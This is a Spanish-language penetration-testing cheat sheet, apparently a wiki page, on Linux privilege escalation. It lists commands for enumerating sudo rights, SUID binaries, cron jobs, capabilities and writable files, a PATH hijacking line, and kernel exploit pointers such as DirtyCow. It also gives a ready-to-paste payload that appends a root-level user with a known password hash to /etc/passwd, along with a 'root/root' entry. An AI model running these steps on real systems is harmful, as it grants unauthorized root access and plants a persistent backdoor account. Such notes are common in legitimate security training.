Elevación de Privilegios

Cambiar de usuario

sudo su
su $user
su - $user

Comandos disponibles como SU

Lista los comandos permitidos (y prohibidos) comandos para el usuario invocador (o el usuario especificado por la opción -U) en el equipo actual.

sudo -l

SUID

Set User ID, permite ejecutar ficheros con los mismos permisos que el usuario que lo creó.

find / -perm -u=s -type f 2>/dev/null

Crontab

cat /etc/crontab
cat /var/spool/cron/crontabs
crontab -l
pspy64

ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Capabilities

getcap -r / 2>/dev/null

Path Hijacking

export PATH = /loquenosinteresa:$PATH

Exploit de kernel

uname -a
cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;

Exploits:

DirtyCow: https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

Revisar permisos /etc/passwd

Crear usuario con permisos de root

echo 'securiters' | openssl passwd -1 -stdin
*contraseña securiters
echo 'securiters:$1$yaydcWmg$BEho28chpEDpOSpl1kKdh0:0:0:root:/root:/bin/bash' >> /etc/passwd
User root/root
root:$1$root$9gr5KxwuEdiI80GtIzd.U0:0:0:root:/root:/bin/bash

Revisar archivos

/var
/var/backups
/opt
find / -writable 2>/dev/null | grep -vE "proc|cgroup"

Recursos

https://gtfobins.github.io/

Herramientas

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

PreviousEnumeración NextShells

Last updated 1 year ago

hashtagCambiar de usuario

hashtagComandos disponibles como SU

hashtagSUID

hashtagCrontab

hashtagCapabilities

hashtagPath Hijacking

hashtagExploit de kernel

hashtagRevisar permisos /etc/passwd

hashtagRevisar archivos

hashtagRecursos

hashtagHerramientas